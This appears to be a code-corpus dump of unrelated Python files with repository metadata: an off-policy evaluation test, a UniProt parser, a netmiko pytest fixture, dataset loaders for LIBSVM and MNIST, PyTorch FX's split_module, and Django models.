switch_dm = switch_estimator.estimate(edp, candidates=0)
# Verify that SwitchDR with low exponent is equivalent to DR
switch_dr_dr = switch_dr_estimator.estimate(edp, exp_base=1)
# Verify that SwitchDR with no candidates is equivalent to DM
switch_dr_dm = switch_dr_estimator.estimate(edp, candidates=0)
logger.info(f"{direct_method}, {inverse_propensity}, {doubly_robust}")
avg_logged_reward = (4 + 5 + 7) / 3
self.assertAlmostEqual(direct_method.raw, (1 + 4 + 5) / 3, delta=1e-6)
self.assertAlmostEqual(
direct_method.normalized, direct_method.raw / avg_logged_reward, delta=1e-6
)
self.assertAlmostEqual(inverse_propensity.raw, 5 / 0.5 / 3, delta=1e-6)
self.assertAlmostEqual(
inverse_propensity.normalized,
inverse_propensity.raw / avg_logged_reward,
delta=1e-6,
)
self.assertAlmostEqual(
doubly_robust.raw, direct_method.raw + 1 / 0.5 * (5 - 4) / 3, delta=1e-6
)
self.assertAlmostEqual(
doubly_robust.normalized, doubly_robust.raw / avg_logged_reward, delta=1e-6
)
self.assertAlmostEqual(switch_ips.raw, inverse_propensity.raw, delta=1e-6)
self.assertAlmostEqual(switch_dm.raw, direct_method.raw, delta=1e-6)
self.assertAlmostEqual(switch_dr_dr.raw, doubly_robust.raw, delta=1e-6)
self.assertAlmostEqual(switch_dr_dm.raw, direct_method.raw, delta=1e-6)
logger.info("---------- Finish evaluating eval_greedy=True -----------------")
logger.info("---------- Start evaluating eval_greedy=False -----------------")
edp = EvaluationDataPage.create_from_tensors_seq2slate(
seq2slate_net, reward_net, ptb, eval_greedy=False
)
doubly_robust_estimator = OPEstimatorAdapter(DoublyRobustEstimator())
dm_estimator = OPEstimatorAdapter(DMEstimator())
ips_estimator = OPEstimatorAdapter(IPSEstimator())
doubly_robust = doubly_robust_estimator.estimate(edp)
inverse_propensity = ips_estimator.estimate(edp)
direct_method = dm_estimator.estimate(edp)
self.assertAlmostEqual(
inverse_propensity.raw,
(0.4 / 0.2 * 4 + 0.3 / 0.5 * 5 + 0.7 / 0.4 * 7) / 3,
delta=1e-6,
)
self.assertAlmostEqual(
inverse_propensity.normalized,
inverse_propensity.raw / avg_logged_reward,
delta=1e-6,
)
logger.info("---------- Finish evaluating eval_greedy=False -----------------")
| [
"[email protected]"
] | |
0be820d8c37117b65098b0e8dcdf0506cc8231b6 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Twitter/DirectMessages/__init__.py | 1d26f95881809e14b918cc47d392e77b4e48342c | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from GetDirectMessages import *
from SendDirectMessage import *
from DestroyDirectMessage import *
from GetMessageByID import *
from DirectMessagesSent import *
| [
"[email protected]"
] | |
15cd6ea92f3995489a00742b8f8fe3837fe89534 | a2dcb0aa714a6f64748a633bb5399498bf369bda | /diana/toolbox/parse_uniprot.py | 71aa629076dd8494272a7c611678801cc399abbc | [
"MIT"
] | permissive | quimaguirre/diana | eefe1c8e571f3f2ac5486e0490a7f4bc886fefcb | 930da0ea91ad87e354061af18db6c437a3318366 | refs/heads/master | 2021-07-08T10:21:26.150879 | 2021-04-13T14:34:31 | 2021-04-13T14:34:31 | 95,761,183 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,091 | py | #########################################################################
# Uniprot XML parser to parse phosphorylation info of proteins
#
# eg 29/07/2009
#########################################################################
#from xml.etree.ElementTree import ElementTree
from xml.etree.ElementTree import iterparse
import TsvReader
def main():
file_name = "../data/disease/uniprot/humdisease.txt"
mim_to_mesh_values = get_mim_to_mesh(file_name)
print len(mim_to_mesh)
print mim_to_mesh["600807"]
return
from time import clock
parser = UniprotXMLParser("../data/Q12888.xml")
#parser = UniprotXMLParser("../../data/phosphorylation/uniprot/uniprot-phosphorylation-large-scale-analysis.xml")
#ids = parser.parse_ids()
#print map(len, ids)
#print ids[-1]
t1 = clock()
elements = parser.parse()
t2 = clock()
print len(elements), elements[-1]
print t2-t1
return
def get_uniprot_to_geneid(file_name, uniprot_ids=None, only_min=True, key_function=int):
"""
To parse HUMAN_9606_idmapping.dat file (trimmed to two columns) from Uniprot
only_min: Chooses the "min" defined by key_function used in min()
key_function: int (geneids) | len (gene symbols)
Creating the file
wget ftp://ftp.uniprot.org/pub/databases/uniprot/current_release/knowledgebase/idmapping/by_organism/HUMAN_9606_idmapping.dat.gz
zgrep Gene_Name HUMAN_9606_idmapping.dat.gz | cut -f 1,3 > uniprot_to_symbol.txt
zgrep GeneID HUMAN_9606_idmapping.dat.gz | cut -f 1,3 > idmapping.tab
OR zcat HUMAN_9606_idmapping_selected.dat.gz | cut -f 1,3 > idmapping.tab
"""
uniprot_to_geneids = {}
#geneid_to_uniprots = {}
f = open(file_name)
f.readline()
for line in f:
uniprot, geneid = line.split("\t")
geneid = geneid.strip()
uniprot = uniprot.strip()
if geneid == "" or uniprot == "":
continue
if uniprot_ids is not None and uniprot not in uniprot_ids:
continue
#if only_min:
# geneid = min(geneid.split("; "), key=key_function)
#uniprot_to_geneids[uniprot] = geneid
uniprot_to_geneids.setdefault(uniprot, set()).add(geneid)
f.close()
if only_min:
uniprot_to_geneid = {}
for uniprot, geneids in uniprot_to_geneids.iteritems():
uniprot_to_geneid[uniprot] = min(geneids, key=key_function)
uniprot_to_geneids = uniprot_to_geneid
return uniprot_to_geneids
def get_uniprot_to_geneid_from_idmapping_file(file_name, uniprot_ids=None):
"""
To parse idmapping.tab from Uniprot
Useful for id mapping of non-human species
"""
parser = TsvReader.TsvReader(file_name, delim="\t", inner_delim=";")
column_to_index, id_to_values = parser.read(fields_to_include=["UniProtKB-AC", "GeneID (EntrezGene)"], keys_to_include=uniprot_ids, merge_inner_values=True)
uniprot_to_geneid = {}
for uniprot, values in id_to_values.iteritems():
for val in values:
geneid = val[column_to_index["geneid (entrezgene)"]]
#if uniprot in uniprot_to_geneid:
# print "multiple gene id", uniprot
#uniprot_to_geneid.setdefault(uniprot, set()).add(geneid)
uniprot_to_geneid[uniprot] = geneid
return uniprot_to_geneid
def get_mim_to_mesh(file_name):
"""
To parse humdisease.txt from Uniprot
"""
mim_to_mesh_values = {}
f = open(file_name)
line = f.readline()
while not line.startswith("ID"):
line = f.readline()
words = line.strip().split()
disease = " ".join(words[1:]).rstrip(".")
for line in f:
words = line.strip().split()
if words[0] == "ID":
disease = " ".join(words[1:]).rstrip(".")
if words[0] == "DR":
id_type = words[1].lower().rstrip(";")
if id_type == "mesh":
mesh = words[2].rstrip(".")
elif id_type == "mim":
mim = words[2].rstrip(";")
if line.startswith("//"):
#if mim in mim_to_mesh_values and mim_to_mesh_values[mim][1] == mesh:
#continue
#if mim in mim_to_mesh_values: print mim, mim_to_mesh_values[mim], disease, mesh
mim_to_mesh_values.setdefault(mim, []).append((disease, mesh))
f.close()
return mim_to_mesh_values
class UniprotXMLParser(object):
NS="{http://uniprot.org/uniprot}"
psiteDesc_to_psiteChar = { "Phosphoserine": "S",
"Phosphothreonine": "T",
"Phosphotyrosine": "Y",
"Phosphohistidine": "H" }
def __init__(self, filename):
self.file_name = filename
#self.etree = ElementTree()
return
def parse_ids_high_mem(self):
self.etree = ElementTree()
tree = self.etree.parse(self.file_name)
#ids = tree.findall(self.NS+"accession")
ids = []
sub_ids = None
for e in tree.getiterator():
if e.tag == self.NS+"entry":
if sub_ids is not None:
ids.append(sub_ids)
sub_ids = []
if e.tag == self.NS+"accession":
sub_ids.append(e.text)
ids.append(sub_ids)
return ids
def parse_ids(self):
ids = []
sub_ids = []
# get an iterable
context = iterparse(self.file_name, ["start", "end"])
# turn it into an iterator
context = iter(context)
# get the root element
event, root = context.next()
for (event, elem) in context:
if event == "end":
if elem.tag == self.NS+"accession":
sub_ids.append(elem.text)
if elem.tag == self.NS+"entry":
ids.append(sub_ids)
sub_ids = []
elem.clear()
root.clear()
return ids
def parse(self):
ignored_modification_types = set()
context = iterparse(self.file_name, ["start", "end"])
context = iter(context)
event, root = context.next()
elements = []
current_element = None
current_position = None
for (event, elem) in context:
if event == "start":
if elem.tag == self.NS+"entry":
current_element = UniprotXMLElement()
elif event == "end":
if elem.tag == self.NS+"accession":
current_element.add_id(elem.text)
elif elem.tag == self.NS+"organism":
db_elm = elem.find(self.NS+"dbReference") #only looks at sublevel - alternative: keep tag stack
if db_elm.get("type") == "NCBI Taxonomy":
current_element.set_tax(db_elm.get("id"))
elif elem.tag == self.NS+"feature" and elem.get("type") == "modified residue":
#print elem.getchildren()
#pos_elm = elem.find(self.NS+"position")
#if elem.get("status") == "probable":
# continue
for sub_elm in elem.getiterator():
if sub_elm.tag == self.NS+"position":
pos_elm = sub_elm
pos = pos_elm.get("position")
desc = elem.get("description")
vals = desc.split(";")
type = vals[0]
kinase = vals[1][vals[1].find("by")+2:].strip() if (len(vals) > 1) else None
if self.psiteDesc_to_psiteChar.has_key(type):
type = self.psiteDesc_to_psiteChar[type]
current_element.add_psite(pos, type, kinase)
else:
ignored_modification_types.add(type)
elif elem.tag == self.NS+"entry":
seq_elm = elem.find(self.NS+"sequence")
current_element.set_sequence(seq_elm.text)
elements.append(current_element)
elem.clear()
root.clear()
print "Ignored mofications: ", ignored_modification_types
return elements
class UniprotXMLElement(object):
def __init__(self):
self.ids = []
self.taxid = None
self.phosphosites = []
self.sequence = None
def add_id(self, id):
self.ids.append(id)
def set_tax(self, taxid):
self.taxid = taxid
def add_psite(self, pos, type=None, kinase=None):
self.phosphosites.append( (pos, type, kinase) )
def set_sequence(self, seq):
self.sequence = seq.replace("\n","")
def get_ids(self):
return self.ids
def get_tax(self):
return self.taxid
def get_psites(self):
return self.phosphosites
def get_sequence(self):
return self.sequence
def __repr__(self):
return "%s\t%s\t%s\t%s" % (self.ids, self.taxid, self.phosphosites, self.sequence)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
8c28b115446dbdfb81f139fe921de4b0f92fdd98 | 2233f520493f64c6070dd3e77722e53a7dd738e8 | /unittest_example/test_fixture.py | 372b4c964d16e91c4d8e53f9fd56d8ddf350e948 | [
"Apache-2.0"
] | permissive | mpjeffin/pynet-ons-oct17 | 690bb31600b8ef5131439bb25ddce35b4855ba6a | d0daf9c250f79bc34b3b8b06b67004f56ef834a2 | refs/heads/master | 2021-09-07T00:00:02.234456 | 2018-02-13T19:58:11 | 2018-02-13T19:58:11 | 125,467,721 | 1 | 0 | null | 2018-03-16T05:26:10 | 2018-03-16T05:26:10 | null | UTF-8 | Python | false | false | 621 | py | import pytest
from getpass import getpass
from netmiko import ConnectHandler
# Fixtures
@pytest.fixture(scope="module")
def netmiko_connect():
cisco1 = {
'device_type': 'cisco_ios',
'ip': '184.105.247.70',
'username': 'pyclass',
'password': getpass()
}
return ConnectHandler(**cisco1)
def test_prompt(netmiko_connect):
print(netmiko_connect.find_prompt())
assert netmiko_connect.find_prompt() == 'pynet-rtr1#'
def test_show_version(netmiko_connect):
output = netmiko_connect.send_command("show version")
assert 'Configuration register is 0x2102' in output
| [
"[email protected]"
] | |
552df7ba2d2c6009f8e016dca6ec864e0e9526d7 | 4c7c8ba4f90e59b5cfdf290a8613c895becd847a | /src/datasets.py | b49b76551de0bca116aeb57121d8117508b6a102 | [] | no_license | stalhabukhari/sls | 00d4f73650d2745cc74aafb5ddcb0af8ae9498de | 98b215212571b545019dd9b199715a9193ec8cfd | refs/heads/master | 2020-12-03T11:15:48.523101 | 2019-12-22T21:45:02 | 2019-12-22T21:45:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,737 | py | import torchvision
from sklearn.model_selection import train_test_split
from torchvision import transforms
import torch
from sklearn import metrics
from src import utils as ut
def get_dataset(dataset_name, train_flag, datadir, exp_dict):
if dataset_name == "mnist":
dataset = torchvision.datasets.MNIST(datadir, train=train_flag,
download=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.5,), (0.5,))
]))
if dataset_name == "cifar10":
transform_function = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465),
(0.2023, 0.1994, 0.2010)),
])
dataset = torchvision.datasets.CIFAR10(
root=datadir,
train=train_flag,
download=True,
transform=transform_function)
if dataset_name == "cifar100":
transform_function = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465),
(0.2023, 0.1994, 0.2010)),
])
dataset = torchvision.datasets.CIFAR100(
root=datadir,
train=train_flag,
download=True,
transform=transform_function)
if dataset_name in ["mushrooms", "w8a",
"rcv1", "ijcnn"]:
sigma_dict = {"mushrooms": 0.5,
"w8a":20.0,
"rcv1":0.25 ,
"ijcnn":0.05}
X, y = load_libsvm(dataset_name, data_dir=datadir)
labels = np.unique(y)
y[y==labels[0]] = 0
y[y==labels[1]] = 1
# TODO: (amishkin) splits = train_test_split(X, y, test_size=0.2, shuffle=True, random_state=9513451)
splits = train_test_split(X, y, test_size=0.2, shuffle=False, random_state=42)
X_train, X_test, Y_train, Y_test = splits
if train_flag:
# fname_rbf = "%s/rbf_%s_train.pkl" % (datadir, dataset_name)
# if os.path.exists(fname_rbf):
# k_train_X = ut.load_pkl(fname_rbf)
# else:
k_train_X = rbf_kernel(X_train, X_train, sigma_dict[dataset_name])
# ut.save_pkl(fname_rbf, k_train_X)
X_train = k_train_X
X_train = torch.FloatTensor(X_train)
Y_train = torch.FloatTensor(Y_train)
dataset = torch.utils.data.TensorDataset(X_train, Y_train)
else:
# fname_rbf = "%s/rbf_%s_test.pkl" % (datadir, dataset_name)
# if os.path.exists(fname_rbf):
# k_test_X = ut.load_pkl(fname_rbf)
# else:
k_test_X = rbf_kernel(X_test, X_train, sigma_dict[dataset_name])
# ut.save_pkl(fname_rbf, k_test_X)
X_test = k_test_X
X_test = torch.FloatTensor(X_test)
Y_test = torch.FloatTensor(Y_test)
dataset = torch.utils.data.TensorDataset(X_test, Y_test)
return dataset
if dataset_name == "synthetic":
margin = exp_dict["margin"]
X, y, _, _ = make_binary_linear(n=exp_dict["n_samples"],
d=exp_dict["d"],
margin=margin,
y01=True,
bias=True,
separable=True,
seed=42)
# No shuffling to keep the support vectors inside the training set
splits = train_test_split(X, y, test_size=0.2, shuffle=False, random_state=42)
X_train, X_test, Y_train, Y_test = splits
X_train = torch.FloatTensor(X_train)
X_test = torch.FloatTensor(X_test)
Y_train = torch.FloatTensor(Y_train)
Y_test = torch.FloatTensor(Y_test)
if train_flag:
dataset = torch.utils.data.TensorDataset(X_train, Y_train)
else:
dataset = torch.utils.data.TensorDataset(X_test, Y_test)
return dataset
if dataset_name == "matrix_fac":
fname = datadir + 'matrix_fac.pkl'
if not os.path.exists(fname):
data = generate_synthetic_matrix_factorization_data()
ut.save_pkl(fname, data)
A, y = ut.load_pkl(fname)
X_train, X_test, y_train, y_test = train_test_split(A, y, test_size=0.2, random_state=9513451)
training_set = torch.utils.data.TensorDataset(torch.tensor(X_train, dtype=torch.float), torch.tensor(y_train, dtype=torch.float))
test_set = torch.utils.data.TensorDataset(torch.tensor(X_test, dtype=torch.float), torch.tensor(y_test, dtype=torch.float))
if train_flag:
dataset = training_set
else:
dataset = test_set
return dataset
# ===========================================================
# matrix matrix_factorization
def generate_synthetic_matrix_factorization_data(xdim=6, ydim=10, nsamples=1000, A_condition_number=1e-10):
"""
Generate a synthetic matrix factorization dataset as suggested by Ben Recht.
See: https://github.com/benjamin-recht/shallow-linear-net/blob/master/TwoLayerLinearNets.ipynb.
"""
Atrue = np.linspace(1, A_condition_number, ydim
).reshape(-1, 1) * np.random.rand(ydim, xdim)
# the inputs
X = np.random.randn(xdim, nsamples)
# the y's to fit
Ytrue = Atrue.dot(X)
data = (X.T, Ytrue.T)
return data
# ===========================================================
# Helpers
import os
import urllib
import numpy as np
from sklearn.svm import SVC
from sklearn.datasets import load_svmlight_file
from torchvision.datasets import MNIST
LIBSVM_URL = "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/"
LIBSVM_DOWNLOAD_FN = {"rcv1" : "rcv1_train.binary.bz2",
"mushrooms" : "mushrooms",
"ijcnn" : "ijcnn1.tr.bz2",
"w8a" : "w8a"}
def load_mnist(data_dir):
dataset = MNIST(data_dir, train=True, transform=None,
target_transform=None, download=True)
X, y = dataset.data.numpy(), dataset.targets.numpy()
X = X / 255.
X = X.reshape((X.shape[0], -1))
return X, y
def load_libsvm(name, data_dir):
if not os.path.exists(data_dir):
os.mkdir(data_dir)
fn = LIBSVM_DOWNLOAD_FN[name]
data_path = os.path.join(data_dir, fn)
if not os.path.exists(data_path):
url = urllib.parse.urljoin(LIBSVM_URL, fn)
print("Downloading from %s" % url)
urllib.request.urlretrieve(url, data_path)
print("Download complete.")
X, y = load_svmlight_file(data_path)
return X, y
def make_binary_linear(n, d, margin, y01=False, bias=False, separable=True, shuffle=True, seed=None):
assert margin >= 0.
if seed:
np.random.seed(seed)
labels = [-1, 1]
# Generate support vectors that are 2 margins away from each other
# that is also linearly separable by a homogeneous separator
w = np.random.randn(d); w /= np.linalg.norm(w)
# Now we have the normal vector of the separating hyperplane, generate
# a random point on this plane, which should be orthogonal to w
p = np.random.randn(d-1); l = (-p@w[:d-1])/w[-1]
p = np.append(p, [l])
# Now we take p as the starting point and move along the direction of w
# by m and -m to obtain our support vectors
v0 = p - margin*w
v1 = p + margin*w
yv = np.copy(labels)
# Start generating points with rejection sampling
X = []; y = []
for i in range(n-2):
label = np.random.choice(labels)
# Generate a random point with mean at the center with variance
# adapted to the margin
xi = np.sqrt(margin)*np.random.randn(d)
dist = xi@w
while dist*label <= margin:
u = v0-v1 if label == -1 else v1-v0
u /= np.linalg.norm(u)
xi = xi + np.sqrt(margin)*u
dist = xi@w
X.append(xi)
y.append(label)
X = np.array(X).astype(float); y = np.array(y).astype(float)
if shuffle:
ind = np.random.permutation(n-2)
X = X[ind]; y = y[ind]
# Put the support vectors at the beginning
X = np.r_[np.array([v0, v1]), X]
y = np.r_[np.array(yv), y]
if separable:
# Assert linear separability
# Since we're supposed to interpolate, we should not regularize.
clff = SVC(kernel="linear", gamma="auto", tol=1e-10, C=1e10)
clff.fit(X, y)
assert clff.score(X, y) == 1.0
# Assert margin obtained is what we asked for
w = clff.coef_.flatten()
sv_margin = np.min(np.abs(clff.decision_function(X)/np.linalg.norm(w)))
assert np.abs(sv_margin - margin) < 1e-4
else:
flip_ind = np.random.choice(n, int(n*0.01))
y[flip_ind] = -y[flip_ind]
if y01:
y[y==-1] = 0
if bias:
# TODO: Get rid of this later, bias should be handled internally,
# this is just for ease of implementation for the Hessian
X = np.c_[np.ones(n), X]
return X, y, w, (v0, v1)
def rbf_kernel(A, B, sigma):
distsq = np.square(metrics.pairwise.pairwise_distances(A, B, metric="euclidean"))
K = np.exp(-1 * distsq/(2*sigma**2))
return K | [
"[email protected]"
] | |
3d25ee146a7fe4d18336d7409cdf3a5289423d1f | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/225/users/4005/codes/1712_2496.py | 3442b9c6e33cbbf122e05bddd7a511c8d9ce8261 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | num = int(input("Digite um numero: "))
c=0
while(num!=-1):
c= c+ num
num = int(input("Digite um numero: "))
print(c) | [
"[email protected]"
] | |
5e57b310c8982173953ff99d06116aa3e3553169 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/5/usersdata/67/2931/submittedfiles/atm.py | a41e9c31c6bb1ca25bc098784953451c866f8b20 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
#COMECE SEU CODIGO AQUI
a=input("Digite o valor:")
c20=a/20
c10=a%20/10
c5=(a%20%10)/5
b=int(c20)
c=int(c10)
d=int(c5)
print(b)
print(c)
print(d)
| [
"[email protected]"
] | |
c6a42a74e17de8f8fa6f756dfce650e95093fe04 | add16900a969741c9e7570d3b7b47b76e22ccd04 | /torch/fx/passes/split_module.py | 238f2a947c0b27b869d8ab6cd6c25f031af3f8a0 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | talemache/pytorch | 55143c60b927a73f6392f7dde1f4fc8ef7ee76e6 | a4da326621418dcccba50d2e827e6644e7f03ed1 | refs/heads/master | 2023-05-09T06:02:30.990411 | 2021-05-30T04:37:41 | 2021-05-30T04:37:41 | 318,314,852 | 2 | 0 | NOASSERTION | 2021-05-30T04:37:41 | 2020-12-03T20:43:29 | null | UTF-8 | Python | false | false | 9,016 | py | import torch
from torch.fx.graph_module import GraphModule
from typing import Callable, List, Dict, Any, Optional
class Partition:
def __init__(self, name: str):
self.name: str = name
self.node_names: List[str] = []
self.inputs: Dict[str, None] = {}
self.outputs: Dict[str, None] = {}
self.partitions_dependent_on: Dict[str, None] = {}
self.partition_dependents: Dict[str, None] = {}
self.graph : torch.fx.graph.Graph = torch.fx.graph.Graph() # type: ignore[attr-defined, name-defined]
self.environment : Dict[torch.fx.node.Node, torch.fx.node.Node] = {} # type: ignore[name-defined]
self.targets : Dict[str, Any] = {}
def __repr__(self) -> str:
return f"name: {self.name},\n" \
f" nodes: {self.node_names},\n" \
f" inputs: {self.inputs},\n" \
f" outputs: {self.outputs},\n" \
f" partitions depenent on: {self.partitions_dependent_on},\n" \
f" parition dependents: {self.partition_dependents}"
# Creates subgraphs out of main graph
def split_module(
m: GraphModule,
root_m: torch.nn.Module,
split_callback: Callable[[torch.fx.node.Node], int], # type: ignore[name-defined]
):
partitions: Dict[str, Partition] = {}
orig_nodes: Dict[str, torch.fx.node.Node] = {} # type: ignore[name-defined]
def record_cross_partition_use(def_node : torch.fx.node.Node, use_node : Optional[torch.fx.node.Node]): # type: ignore[name-defined] # noqa: B950
def_partition_name = getattr(def_node, '_fx_partition', None)
use_partition_name = getattr(use_node, '_fx_partition', None)
if def_partition_name != use_partition_name:
if def_partition_name is not None:
def_partition = partitions[def_partition_name]
def_partition.outputs.setdefault(def_node.name)
if use_partition_name is not None:
def_partition.partition_dependents.setdefault(use_partition_name)
if use_partition_name is not None:
use_partition = partitions[use_partition_name]
use_partition.inputs.setdefault(def_node.name)
if def_partition_name is not None:
use_partition.partitions_dependent_on.setdefault(def_partition_name)
# split nodes into parititons
for node in m.graph.nodes:
orig_nodes[node.name] = node
# TODO currently placeholders/parameters aren't put into random partitions,
# rather they're added to the graphs where they are used down below
if node.op in ["placeholder", "get_attr"]:
continue
if node.op == 'output':
torch.fx.graph.map_arg(node.args[0], lambda n: record_cross_partition_use(n, None)) # type: ignore[attr-defined]
continue
partition_name = str(split_callback(node))
# add node to partitions
partition = partitions.get(partition_name)
if partition is None:
partitions[partition_name] = partition = Partition(partition_name)
partition.node_names.append(node.name)
node._fx_partition = partition_name
torch.fx.graph.map_arg(node.args, lambda def_node: record_cross_partition_use(def_node, node)) # type: ignore[attr-defined]
torch.fx.graph.map_arg(node.kwargs, lambda def_node: record_cross_partition_use(def_node, node)) # type: ignore[attr-defined] # noqa: B950
# find partitions with no dependencies
root_partitions : List[str] = []
for partition_name, partition in partitions.items():
if not len(partition.partitions_dependent_on):
root_partitions.append(partition_name)
# check partitions for circular dependencies and create topological partition ordering
sorted_partitions : List[str] = []
while root_partitions:
root_partition = root_partitions.pop()
sorted_partitions.append(root_partition)
for dependent in partitions[root_partition].partition_dependents:
partitions[dependent].partitions_dependent_on.pop(root_partition)
if not partitions[dependent].partitions_dependent_on:
root_partitions.append(dependent)
if len(sorted_partitions) != len(partitions):
raise RuntimeError("cycle exists between partitions!")
# add placeholders to parititons
for partition_name in sorted_partitions:
partition = partitions[partition_name]
for input in partition.inputs:
placeholder = partition.graph.placeholder(input)
placeholder.meta = orig_nodes[input].meta.copy()
partition.environment[orig_nodes[input]] = placeholder
# Transform nodes and collect targets for partition's submodule
for node in m.graph.nodes:
if hasattr(node, '_fx_partition'):
partition = partitions[node._fx_partition]
# swap out old graph nodes in kw/args with references to new nodes in this submodule
environment = partition.environment
gathered_args = torch.fx.graph.map_arg(node.args, lambda n : environment[n]) # type: ignore[attr-defined]
gathered_kwargs = torch.fx.graph.map_arg(node.kwargs, lambda n : environment[n]) # type: ignore[attr-defined]
if node.op not in ['call_module', 'get_attr']:
target = node.target
else:
target_atoms = node.target.split('.')
target_attr = m
for atom in target_atoms:
if not hasattr(target_attr, atom):
raise RuntimeError(f'Operator target {node.target} not found!')
target_attr = getattr(target_attr, atom)
# target = target_atoms[-1]
target = '_'.join(target_atoms)
partition.targets[target] = target_attr
assert isinstance(gathered_args, tuple)
assert isinstance(gathered_kwargs, dict)
new_node = partition.graph.create_node(op=node.op, target=target, args=gathered_args,
kwargs=gathered_kwargs)
new_node.meta = node.meta.copy()
partition.environment[node] = new_node
# Set up values to construct base module
base_mod_env : Dict[str, torch.fx.node.Node] = {} # type: ignore[name-defined]
base_mod_graph : torch.fx.graph.Graph = torch.fx.graph.Graph() # type: ignore[attr-defined, name-defined]
base_mod_attrs : Dict[str, torch.fx.graph_module.GraphModule] = {} # type: ignore[name-defined]
for node in m.graph.nodes:
if node.op == 'placeholder':
base_mod_env[node.name] = base_mod_graph.placeholder(node.name)
elif node.op == 'get_attr':
base_mod_env[node.name] = base_mod_graph.get_attr(node.target)
attr_val = m
for atom in node.target.split('.'):
if not hasattr(attr_val, atom):
raise RuntimeError(f'Node target {node.target} not found!')
attr_val = getattr(attr_val, atom)
base_mod_attrs[node.target] = attr_val
# Do some things iterating over the partitions in topological order again:
# 1) Finish off submodule Graphs by setting corresponding outputs
# 2) Construct GraphModules for each submodule
# 3) Construct the base graph by emitting calls to those submodules in
# topological order
for partition_name in sorted_partitions:
partition = partitions[partition_name]
# Set correct output values
output_vals = tuple(partition.environment[orig_nodes[name]] for name in partition.outputs)
output_vals = output_vals[0] if len(output_vals) == 1 else output_vals # type: ignore[assignment]
partition.graph.output(output_vals)
# Construct GraphModule for this partition
submod_name = f'submod_{partition_name}'
base_mod_attrs[submod_name] = torch.fx.graph_module.GraphModule(partition.targets, partition.graph) # type: ignore[attr-defined] # noqa: B950
# Emit call in base graph to this submodule
output_val = base_mod_graph.call_module(submod_name, tuple(base_mod_env[name] for name in partition.inputs))
if len(partition.outputs) > 1:
# Unpack multiple return values from submodule
output_val_proxy = torch.fx.proxy.Proxy(output_val) # type: ignore[attr-defined]
for i, output_name in enumerate(partition.outputs):
base_mod_env[output_name] = output_val_proxy[i].node # type: ignore[index]
else:
base_mod_env[list(partition.outputs)[0]] = output_val
for node in m.graph.nodes:
if node.op == 'output':
base_mod_graph.output(torch.fx.graph.map_arg(node.args[0], lambda n : base_mod_env[n.name])) # type: ignore[attr-defined] # noqa: B950
return torch.fx.graph_module.GraphModule(base_mod_attrs, base_mod_graph) # type: ignore[attr-defined]
| [
"[email protected]"
] | |
a17dee7c5fb944081c8050c5f45db1235e19af04 | ba7be04fa897785fb9255df3ece0c1ffbead6acc | /db_model/__models.py | 5e401af90c7c2baa39db7a572dafabe7e1a10704 | [] | no_license | backupalisher/part4_project | e1f402553502d010ffe974ecce73e313f90b8174 | 09ca16e3021aeac609fe6594e5c4f6c72832d112 | refs/heads/master | 2022-12-10T13:22:15.899332 | 2020-09-21T16:22:02 | 2020-09-21T16:22:02 | 233,295,277 | 0 | 0 | null | 2022-12-08T10:47:45 | 2020-01-11T20:49:10 | Python | UTF-8 | Python | false | false | 3,601 | py | from django.db import models
# Create your models here.
class Brands(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=255)
logotype = models.CharField(max_length=255)
class Meta:
db_table = 'brands'
class Cartridge(models.Model):
id = models.IntegerField(primary_key=True)
title = models.CharField(max_length=255)
model = models.CharField(max_length=255)
code = models.CharField(max_length=255)
analogs = models.TextField()
techs = models.TextField()
brand_id = models.ForeignKey('Brands', on_delete=models.DO_NOTHING)
class Meta:
db_table = 'cartridge'
class Details(models.Model):
id = models.IntegerField(primary_key=True)
partcode_id = models.IntegerField()
model_id = models.IntegerField()
module_id = models.IntegerField()
spr_detail_id = models.IntegerField()
class Meta:
db_table = 'details'
class DetailOptions(models.Model):
id = models.IntegerField(primary_key=True)
caption_spr_id = models.IntegerField()
detail_option_spr_id = models.IntegerField()
parent_id = models.IntegerField()
icon = models.CharField(max_length=255)
value = models.IntegerField()
class Meta:
db_table = 'detail_options'
class FilterSettings(models.Model):
id = models.IntegerField(primary_key=True)
caption = models.CharField(max_length=255)
subcaption = models.CharField(max_length=255)
sub_id = models.IntegerField()
type = models.CharField(max_length=255)
values = models.TextField()
caption_en = models.CharField(max_length=255)
subcaption_en = models.CharField(max_length=255)
parent_id = models.IntegerField()
class Meta:
db_table = 'filter_settings'
